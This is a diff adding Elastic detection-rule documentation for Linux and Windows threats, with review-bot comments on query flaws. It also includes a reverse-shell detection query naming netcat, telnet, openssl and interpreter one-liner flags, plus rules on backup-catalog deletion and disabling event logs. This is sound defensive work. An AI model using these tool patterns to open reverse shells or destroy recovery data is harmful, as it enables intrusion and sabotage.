https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Web Service +** ID: T1102 +** Reference URL: https://attack.mitre.org/techniques/T1102/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ +* Sub-technique: +** Name: Domain Generation Algorithms +** ID: T1568.002 +** Reference URL: https://attack.mitre.org/techniques/T1568/002/ +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Web Service +** ID: T1567 +** Reference URL: https://attack.mitre.org/techniques/T1567/ +* Sub-technique: +** Name: Exfiltration to Code Repository +** ID: T1567.001 +** Reference URL: https://attack.mitre.org/techniques/T1567/001/ +* Sub-technique: +** Name: Exfiltration 
to Cloud Storage +** ID: T1567.002 +** Reference URL: https://attack.mitre.org/techniques/T1567/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-external-network-via-telnet.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-external-network-via-telnet.asciidoc new file mode 100644 index 0000000000..e176a52039 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-external-network-via-telnet.asciidoc 
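Review bot: In the Connection to Commonly Abused Web Services investigation guide, the last step, "searching for login events (for example, 4624) to the target host after the registry modification", refers to a registry modification this rule never observes; the query is a DNS rule (`network where ... network.protocol == "dns"`), so the sentence should say "after the DNS request" or be dropped. Likewise "Investigate the script execution chain" should read "process execution chain", matching the other guides in this patch. Separately, the ATT&CK mapping lists Dynamic Resolution / Domain Generation Algorithms (T1568.002), but the query matches a static list of known service domains and contains nothing that identifies algorithmically generated names; either remove that sub-technique or document why it applies.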
@@ -0,0 +1,70 @@ +[[prebuilt-rule-8-10-5-connection-to-external-network-via-telnet]] +=== Connection to External Network via Telnet + +Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to publicly routable IP addresses. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id + [process where host.os.type == "linux" and process.name == "telnet" and event.type == "start"] + [network where host.os.type == "linux" and process.name == "telnet" and + not cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", + "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", + "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", + "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", "100.64.0.0/10", "192.175.48.0/24", + "198.18.0.0/15", "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", "::1", + "FE80::/10", "FF00::/8")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: 
https://attack.mitre.org/techniques/T1021/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-internal-network-via-telnet.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-internal-network-via-telnet.asciidoc new file mode 100644 index 0000000000..69e97a16f9 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-connection-to-internal-network-via-telnet.asciidoc 
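Review bot: In the Connection to External Network via Telnet query, the `cidrmatch` exclusion list covers the IPv4 special-purpose ranges plus `::1`, `FE80::/10` and `FF00::/8`, but not the IPv6 unique local range `fc00::/7`, so a telnet session to an internal ULA address is classified as external. If the intent is to mirror the IANA special-purpose registries, add `fc00::/7` and cite the IPv6 special registry alongside the IPv4 one under References. Also, the `sequence` carries no `maxspan`; that is acceptable here because both events are keyed on the same `process.entity_id`, but a comment saying so would prevent someone "fixing" it later.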
@@ -0,0 +1,70 @@ +[[prebuilt-rule-8-10-5-connection-to-internal-network-via-telnet]] +=== Connection to Internal Network via Telnet + +Telnet provides a command line interface for communication with a remote device or server. This rule identifies Telnet network connections to non-publicly routable IP addresses. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Defend + +*Version*: 105 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by process.entity_id + [process where host.os.type == "linux" and process.name == "telnet" and event.type == "start"] + [network where host.os.type == "linux" and process.name == "telnet" and + cidrmatch(destination.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", + "192.0.0.0/29", "192.0.0.8/32", "192.0.0.9/32", "192.0.0.10/32", "192.0.0.170/32", + "192.0.0.171/32", "192.0.2.0/24", "192.31.196.0/24", "192.52.193.0/24", + "192.168.0.0/16", "192.88.99.0/24", "224.0.0.0/4", "100.64.0.0/10", "192.175.48.0/24", + "198.18.0.0/15", "198.51.100.0/24", "203.0.113.0/24", "240.0.0.0/4", "::1", + "FE80::/10", "FF00::/8")] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: 
https://attack.mitre.org/techniques/T1021/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-of-hidden-files-and-directories-via-commandline.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-of-hidden-files-and-directories-via-commandline.asciidoc new file mode 100644 index 0000000000..0565cc2188 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-of-hidden-files-and-directories-via-commandline.asciidoc 
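Review bot: The Connection to Internal Network via Telnet query is the exact complement of the external rule and repeats its CIDR list verbatim; the two lists must be kept in sync, and the missing `fc00::/7` noted on the external rule means a ULA destination matches neither rule. Within this list, `127.0.0.0/8` and `::1` classify loopback as "internal network", so a routine `telnet localhost <port>` service check on a host raises a Lateral Movement alert; consider excluding loopback or naming it in the description as a known false positive source.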
@@ -0,0 +1,71 @@ +[[prebuilt-rule-8-10-5-creation-of-hidden-files-and-directories-via-commandline]] +=== Creation of Hidden Files and Directories via CommandLine + +Users can mark specific files as hidden simply by putting a "." as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion. This rule looks for hidden files or folders in common writable directories. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 33 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.type == "start" and +process.working_directory in ("/tmp", "/var/tmp", "/dev/shm") and +process.args regex~ """\.[a-z0-9_\-][a-z0-9_\-\.]{1,254}""" and +not process.name in ("ls", "find", "grep", "git") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hide Artifacts +** ID: T1564 +** Reference URL: https://attack.mitre.org/techniques/T1564/ +* Sub-technique: +** Name: Hidden Files and Directories +** ID: T1564.001 +** Reference URL: https://attack.mitre.org/techniques/T1564/001/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ 
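Review bot: In the Creation of Hidden Files and Directories via CommandLine query, nothing checks that a file is actually being created: `process.args regex~ """\.[a-z0-9_\-][a-z0-9_\-\.]{1,254}"""` fires on any process started in `/tmp`, `/var/tmp` or `/dev/shm` whose argument begins with a dot, so `cat .profile` or `rm .x` alert exactly like `touch .x`, while only `ls`, `find`, `grep` and `git` are suppressed. Either restrict the rule to file-creating commands or reword the title and description to "reference to" rather than "creation of". Also, `process.working_directory in ("/tmp", "/var/tmp", "/dev/shm")` is an exact match, so subdirectories such as `/tmp/build` are not covered; if that is intended, the description should say "directly in" rather than "in".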
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-of-hidden-shared-object-file.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-of-hidden-shared-object-file.asciidoc new file mode 100644 index 0000000000..29a0360615 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-of-hidden-shared-object-file.asciidoc 
@@ -0,0 +1,66 @@ +[[prebuilt-rule-8-10-5-creation-of-hidden-shared-object-file]] +=== Creation of Hidden Shared Object File + +Identifies the creation of a hidden shared object (.so) file. Users can mark specific files as hidden simply by putting a "." as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion. + +*Rule type*: eql + +*Rule indices*: + +* auditbeat-* +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 33 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "linux" and event.type == "creation" and file.extension == "so" and file.name : ".*.so" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hide Artifacts +** ID: T1564 +** Reference URL: https://attack.mitre.org/techniques/T1564/ +* Sub-technique: +** Name: Hidden Files and Directories +** ID: T1564.001 +** Reference URL: https://attack.mitre.org/techniques/T1564/001/ 
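Review bot: In the Creation of Hidden Shared Object File query, `file.extension == "so"` excludes versioned libraries: for a file named `.libx.so.6` the ECS `file.extension` is `6`, so a hidden versioned shared object never matches even though versioned names are the norm on Linux. Consider dropping the extension clause and widening the name pattern to `file.name : (".*.so", ".*.so.*")`, or document the gap in the description.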
diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-or-modification-of-a-new-gpo-scheduled-task-or-service.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-or-modification-of-a-new-gpo-scheduled-task-or-service.asciidoc new file mode 100644 index 0000000000..9735ca3c01 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-creation-or-modification-of-a-new-gpo-scheduled-task-or-service.asciidoc 
@@ -0,0 +1,91 @@ +[[prebuilt-rule-8-10-5-creation-or-modification-of-a-new-gpo-scheduled-task-or-service]] +=== Creation or Modification of a new GPO Scheduled Task or Service + +Detects the creation or modification of a new Group Policy based scheduled task or service. These methods are used for legitimate system administration, but can also be abused by an attacker with domain admin permissions to execute a malicious payload remotely on all or a subset of the domain joined machines. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Privilege Escalation +* Tactic: Persistence +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 106 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type != "deletion" and + file.path : ("?:\\Windows\\SYSVOL\\domain\\Policies\\*\\MACHINE\\Preferences\\ScheduledTasks\\ScheduledTasks.xml", + "?:\\Windows\\SYSVOL\\domain\\Policies\\*\\MACHINE\\Preferences\\Services\\Services.xml") and + not process.name : "dfsrs.exe" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Domain Policy Modification +** ID: T1484 +** Reference URL: https://attack.mitre.org/techniques/T1484/ +* 
Sub-technique: +** Name: Group Policy Modification +** ID: T1484.001 +** Reference URL: https://attack.mitre.org/techniques/T1484/001/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-cron-job-created-or-changed-by-previously-unknown-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-cron-job-created-or-changed-by-previously-unknown-process.asciidoc new file mode 100644 index 0000000000..227ec41290 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-cron-job-created-or-changed-by-previously-unknown-process.asciidoc 
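Review bot: The Creation or Modification of a new GPO Scheduled Task or Service hunk ships an empty Investigation guide: the `[source, markdown]` block has nothing between its delimiters, and the Tags list correctly omits "Resources: Investigation Guide". Either drop the empty section or populate it with at least the basic triage steps (which account and host wrote `ScheduledTasks.xml` or `Services.xml`, and whether a corresponding GPO change was expected). On the query, `not process.name : "dfsrs.exe"` excludes DFS replication by name alone; tolerable for a low-severity rule, but a comment stating why it is excluded would help later tuning.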
@@ -0,0 +1,97 @@ +[[prebuilt-rule-8-10-5-cron-job-created-or-changed-by-previously-unknown-process]] +=== Cron Job Created or Changed by Previously Unknown Process + +Linux cron jobs are scheduled tasks that can be leveraged by malicious actors for persistence, privilege escalation and command execution. By creating or modifying cron job configurations, attackers can execute malicious commands or scripts at predefined intervals, ensuring their continued presence and enabling unauthorized activities. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Privilege Escalation +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type : "linux" and event.action : ("change" or "file_modify_event" or "creation" or "file_create_event") and +file.path : (/etc/cron.allow or /etc/cron.deny or /etc/cron.d/* or /etc/cron.hourly/* or /etc/cron.daily/* or +/etc/cron.weekly/* or /etc/cron.monthly/* or /etc/crontab or /usr/sbin/cron or /usr/sbin/anacron) +and not (process.name : ("dpkg" or "dockerd" or "rpm" or "snapd" or "yum" or "exe" or "dnf" or "5") or +file.extension : ("swp" or "swpx")) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* 
Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Cron +** ID: T1053.003 +** Reference URL: https://attack.mitre.org/techniques/T1053/003/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Cron +** ID: T1053.003 +** Reference URL: https://attack.mitre.org/techniques/T1053/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Cron +** ID: T1053.003 +** Reference URL: https://attack.mitre.org/techniques/T1053/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-deleting-backup-catalogs-with-wbadmin.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-deleting-backup-catalogs-with-wbadmin.asciidoc new file mode 100644 index 0000000000..f63452fe29 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-deleting-backup-catalogs-with-wbadmin.asciidoc 
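Review bot: the rule type is `new_terms`, but nothing in this hunk says which field(s) the new-terms comparison keys on or what history window it uses, so a reader cannot tell what "previously unknown process" means here; add the new-terms field (the title suggests the process name or executable) and the window to the metadata. Separately, the exclusion list `process.name : ("dpkg" or "dockerd" or "rpm" or "snapd" or "yum" or "exe" or "dnf" or "5")` contains `"exe"` and `"5"`, which read like placeholders or truncated names; either explain them in a false-positive section or remove them.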
@@ -0,0 +1,115 @@ +[[prebuilt-rule-8-10-5-deleting-backup-catalogs-with-wbadmin]] +=== Deleting Backup Catalogs with Wbadmin + +Identifies use of the wbadmin.exe to delete the backup catalog. Ransomware and other malware may do this to prevent system recovery. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Impact +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Deleting Backup Catalogs with Wbadmin + +Windows Server Backup stores the details about your backups (what volumes are backed up and where the backups are located) in a file called a backup catalog, which ransomware victims can use to recover corrupted backup files. Deleting these files is a common step in threat actor playbooks. + +This rule identifies the deletion of the backup catalog using the `wbadmin.exe` utility. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. 
+- Investigate other alerts associated with the user/host during the past 48 hours. +- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts. +- Check if any files on the host machine have been encrypted. + +### False positive analysis + +- Administrators can use this command to delete corrupted catalogs, but overall the activity is unlikely to be legitimate. + +### Related rules + +- Third-party Backup Files Deleted via Unexpected Process - 11ea6bec-ebde-4d71-a8e9-784948f8e3e9 +- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921 +- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4 +- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities. +- If any backups were affected: + - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.). +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : "wbadmin.exe" or process.pe.original_file_name == "WBADMIN.EXE") and + process.args : "catalog" and process.args : "delete" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Inhibit System Recovery +** ID: T1490 +** Reference URL: https://attack.mitre.org/techniques/T1490/ +* Technique: +** Name: Data Destruction +** ID: T1485 +** Reference URL: https://attack.mitre.org/techniques/T1485/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc new file mode 100644 index 0000000000..26d2007580 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc 
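Review bot: the query tests `process.args : "catalog" and process.args : "delete"` independently, so it fires when both tokens appear anywhere in the command line rather than on the literal `delete catalog` subcommand; that is fine for coverage, but the guide should say so, since an analyst reading "Identifies use of the wbadmin.exe to delete the backup catalog" will expect an exact-subcommand match. Two wording fixes in the same hunk: drop the article in "use of the wbadmin.exe", and in the guide the clause "which ransomware victims can use to recover corrupted backup files" is confusing; "which Windows Server Backup needs in order to locate and restore backups" states what the catalog is for.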
@@ -0,0 +1,95 @@ +[[prebuilt-rule-8-10-5-deprecated-potential-reverse-shell-via-suspicious-parent-process]] +=== Deprecated - Potential Reverse Shell via Suspicious Parent Process + +This detection rule detects the creation of a shell through a suspicious parent child relationship. Any reverse shells spawned by the specified utilities that use a forked process to initialize the connection attempt will be captured through this rule. Attackers may spawn reverse shells to establish persistence onto a target system. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +This rule was deprecated due to its addition to the umbrella `Potential Reverse Shell via Suspicious Child Process` (76e4d92b-61c1-4a95-ab61-5fd94179a1ee) rule. 
+---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.parent.entity_id with maxspan=1s +[ process where host.os.type == "linux" and event.type == "start" and event.action == "fork" and ( + (process.name : "python*" and process.args == "-c" and not process.args == "/usr/bin/supervisord") or + (process.name : "php*" and process.args == "-r") or + (process.name : "perl" and process.args == "-e") or + (process.name : "ruby" and process.args in ("-e", "-rsocket")) or + (process.name : "lua*" and process.args == "-e") or + (process.name : "openssl" and process.args : "-connect") or + (process.name : ("nc", "ncat", "netcat") and process.args_count >= 3 and not process.args == "-z") or + (process.name : "telnet" and process.args_count >= 3) or + (process.name : "awk")) and + process.parent.name : ("python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk") ] +[ network where host.os.type == "linux" and event.type == "start" and event.action in ("connection_attempted", "connection_accepted") and + process.name : ("python*", "php*", "perl", "ruby", "lua*", "openssl", "nc", "netcat", "ncat", "telnet", "awk") and + destination.ip != null and destination.ip != "127.0.0.1" and destination.ip != "::1" ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: 
https://attack.mitre.org/techniques/T1071/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disable-windows-event-and-security-logs-using-built-in-tools.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disable-windows-event-and-security-logs-using-built-in-tools.asciidoc new file mode 100644 index 0000000000..f79186ef9b --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-disable-windows-event-and-security-logs-using-built-in-tools.asciidoc 
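Review bot: the description says attackers "spawn reverse shells to establish persistence onto a target system", but the hunk's own ATT&CK mapping is Execution (T1059.004) and Command and Control (T1071), and a reverse shell is an access and C2 mechanism rather than a persistence one; suggest "to obtain remote command execution on a target system". The tag list is also out of step with that mapping: it carries `Tactic: Execution` only, while the framework section adds `Command and Control`, so add the missing tag or drop the second mapping. Finally, the only statement that this rule is deprecated in favour of `Potential Reverse Shell via Suspicious Child Process` sits inside the investigation guide; repeating it in the description line keeps it visible in rule lists.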
@@ -0,0 +1,132 @@ +[[prebuilt-rule-8-10-5-disable-windows-event-and-security-logs-using-built-in-tools]] +=== Disable Windows Event and Security Logs Using Built-in Tools + +Identifies attempts to disable EventLog via the logman Windows utility, PowerShell, or auditpol. This is often done by attackers in an attempt to evade detection on a system. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/logman +* https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 108 + +*Rule authors*: + +* Elastic +* Ivan Ninichuck +* Austin Songer + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Disable Windows Event and Security Logs Using Built-in Tools + +Windows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries can tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response. + +This rule looks for the usage of different utilities to disable the EventLog service or specific event logs. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. 
